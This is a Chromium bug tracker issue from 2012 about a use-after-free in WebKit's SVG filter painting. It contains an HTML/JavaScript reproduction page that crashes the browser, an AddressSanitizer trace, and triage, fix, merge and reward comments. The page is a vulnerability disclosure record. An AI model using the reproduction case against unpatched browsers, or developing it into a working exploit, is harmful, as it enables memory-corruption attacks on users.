New issue
Advanced search Search tips
Starred by 1 user

Issue metadata

Status: Fixed
Owner:
Closed: Dec 2012
Cc:
Components:
EstimatedDays: ----
NextAction: ----
OS: ----
Pri: 1
Type: Bug-Security



Sign in to add a comment
link

Issue 156567: Security: use-after-free in WebCore::GraphicsContext::paintingDisabled

Reported by miau...@gmail.com, Oct 18 2012

Issue description

VULNERABILITY DETAILS
use-after-free in WebCore::GraphicsContext::paintingDisabled

VERSION
Chrome Version: dev

Chromium	24.0.1301.0 (Developer Build 162597) 
OS	Linux 
WebKit	537.16 (@131643)
JavaScript	V8 3.14.4.1

causes infinite recursion in older versions (prior to the other svg bugfix)

Operating System: 64bit ubuntu precise

REPRODUCTION CASE
<html>
  <head>
    <script>
      onload = function() {
        el0=document.createElementNS('http://www.w3.org/2000/svg', 'svg')
        el0.setAttribute('id','el0')
        document.body.appendChild(el0)
        el1=document.createElementNS('http://www.w3.org/2000/svg', 'g')
        el1.setAttribute('filter', 'url(#el2)')
        el0.appendChild(el1)
        el2=document.createElementNS('http://www.w3.org/2000/svg', 'filter')
        el2.setAttribute('id','el2')
        el0.appendChild(el2)
        el3=document.createElementNS('http://www.w3.org/2000/svg', 'feImage')
        el3.setAttributeNS('http://www.w3.org/1999/xlink', 'xlink:href', '#el0')
        el2.appendChild(el3)
        document.body.offsetTop
        el0.setAttribute('filter', 'url(#el2)')
      }
    </script>
  </head>
  <body>
  </body>
</html>


FOR CRASHES, PLEASE INCLUDE THE FOLLOWING ADDITIONAL INFORMATION
Type of crash: tab + asan
Crash State: 

==7986== ERROR: AddressSanitizer heap-use-after-free on address 0x7fffebb2beec at pc 0x55555a030bba bp 0x7fffffff4780 sp 0x7fffffff4778
READ of size 1 at 0x7fffebb2beec thread T0
    #0 0x55555a030bb9 in WebCore::GraphicsContext::paintingDisabled() const ???:0
    #1 0x55555a0abaf2 in WebCore::GraphicsContext::concatCTM(WebCore::AffineTransform const&) ???:0
    #2 0x55555c30a2f9 in WebCore::RenderSVGResourceFilter::postApplyResource(WebCore::RenderObject*, WebCore::GraphicsContext*&, unsigned short, WebCore::Path const*, WebCore::RenderSVGShape const*) ???:0

0x7fffebb2beec is located 108 bytes inside of 144-byte region [0x7fffebb2be80,0x7fffebb2bf10)
freed by thread T0 here:
    #0 0x55555f967df0 in __interceptor_free ??:0
    #1 0x55555a0b2a95 in WebCore::ImageBuffer::~ImageBuffer() ???:0
    #2 0x55555c307e20 in WebCore::RenderSVGResourceFilter::applyResource(WebCore::RenderObject*, WebCore::RenderStyle*, WebCore::GraphicsContext*&, unsigned short) ???:0
    #3 0x55555c04d9dc in WebCore::SVGRenderingContext::prepareToRenderSVGContent(WebCore::RenderObject*, WebCore::PaintInfo&, WebCore::SVGRenderingContext::NeedsGraphicsContextSave) ???:0
 
svg3.html
826 bytes View Download
svg3.txt
19.3 KB View Download

Comment 1 by infe...@chromium.org, Oct 18 2012

Cc: pdr@chromium.org fmalita@chromium.org
Labels: WebKit-SVG
Owner: schenney@chromium.org

Comment 2 by infe...@chromium.org, Oct 18 2012

Status: Assigned

Comment 3 by schenney@chromium.org, Oct 22 2012

Labels: WebKit-ID-94652

Comment 4 by schenney@chromium.org, Oct 30 2012

Labels: Merge-Requested
Apparently BugDroid failed to pick up that this was fixed in WebKit r132856: <http://trac.webkit.org/changeset/132856>.

Merge requested for m23. Reward?

Comment 5 by schenney@chromium.org, Oct 30 2012

Status: FixUnreleased

Comment 6 by infe...@chromium.org, Oct 30 2012

Labels: -Pri-0 -Area-Undefined -Merge-Requested Pri-1 Area-WebKit Merge-Approved reward-topanel Mstone-23 SecImpacts-Stable SecImpacts-Beta Stability-AddressSanitizer
I don't think it will make to m23 stable (needs bake time on trunk), but m23 stable first patch.

Comment 7 by scarybea...@gmail.com, Oct 30 2012

Labels: -Restrict-View-SecurityTeam Restrict-View-SecurityNotify SecSeverity-High

Comment 8 by schenney@chromium.org, Oct 30 2012

Sorry, I interpret Abhishek's comment to mean don't merge, but the MergeApproved flag is set. Please clarify. :-)

And the Chromium Notifier just IMed me. also apparently upset.

Comment 9 by kareng@google.com, Oct 30 2012

Labels: -Merge-Approved Merge-Requested
please don't merge just now. i'm still in the process of getting a good build. if i read abishek's comment right he's saying we'll take it for stable 2. i will give you heads up as soon as it's ok to merge. chris/abishek, is that ok?

(setting back to requested to i don't lose it.)

Comment 10 by scarybea...@gmail.com, Oct 30 2012

Hey Karen, generally, "Merge-Approved" still means we'll wait for you to say it's ok. Security merges are tackled pretty much by myself or Abhishek and we do not fire them off indiscriminately :P

Comment 11 by infe...@chromium.org, Oct 30 2012

Labels: -Merge-Requested Merge-Approved
Answer to first question: Security bugs have blanket merge approval, we use the flag to keep track of which bugs to merge. But we do the actual merge when the merge window opens (and after letting it bake and checking with the RM)

Answer to second question: ignore that, we need to get that fixed. known issue.

Overall conclusion: Keep fixing awesome bugs, leave the merges to the security team :)

I have talked to Karen and told that we are not merging this to branch right now, but for the next m23 patch.

Comment 12 by scarybea...@gmail.com, Nov 12 2012

Labels: -reward-topanel reward-1000 reward-unpaid
$1000 for miaubiz!

Comment 13 by scarybea...@gmail.com, Nov 12 2012

Labels: -Merge-Approved Merge-Merged
M23: http://trac.webkit.org/changeset/134258

Comment 16 by scarybea...@gmail.com, Dec 14 2012

Labels: -reward-unpaid
Payment in system as part of $3000 batch.

Comment 17 by jsc...@chromium.org, Dec 20 2012

Status: Fixed

Comment 18 by bugdroid1@chromium.org, Mar 10 2013

Project Member
Labels: -Type-Security -Area-WebKit -WebKit-SVG -Mstone-23 -SecImpacts-Stable -SecImpacts-Beta -Stability-AddressSanitizer -SecSeverity-High Cr-Content Security-Impact-Stable Security-Impact-Beta Cr-Content-SVG M-23 Performance-Memory-AddressSanitizer Type-Bug-Security Security-Severity-High

Comment 19 by scarybea...@gmail.com, Mar 21 2013

Labels: -Restrict-View-SecurityNotify

Comment 20 by bugdroid1@chromium.org, Mar 21 2013

Project Member
Labels: -Security-Severity-High Security_Severity-High

Comment 21 by bugdroid1@chromium.org, Mar 21 2013

Project Member
Labels: -Security-Impact-Stable Security_Impact-Stable

Comment 22 by bugdroid1@chromium.org, Mar 21 2013

Project Member
Labels: -Security-Impact-Beta Security_Impact-Beta

Comment 23 by bugdroid1@chromium.org, Apr 1 2013

Project Member
Labels: -Performance-Memory-AddressSanitizer Stability-Memory-AddressSanitizer

Comment 24 by bugdroid1@chromium.org, Apr 5 2013

Project Member
Labels: -Cr-Content Cr-Blink

Comment 25 by bugdroid1@chromium.org, Apr 6 2013

Project Member
Labels: -Cr-Content-SVG Cr-Blink-SVG

Comment 27 by sheriffbot@chromium.org, Jun 14 2016

Project Member
Labels: -security_impact-beta

Comment 28 by sheriffbot@chromium.org, Oct 1 2016

Project Member
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot

Comment 29 by sheriffbot@chromium.org, Oct 2 2016

Project Member
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot

Comment 30 by mbarbe...@chromium.org, Oct 2 2016

Labels: allpublic

Sign in to add a comment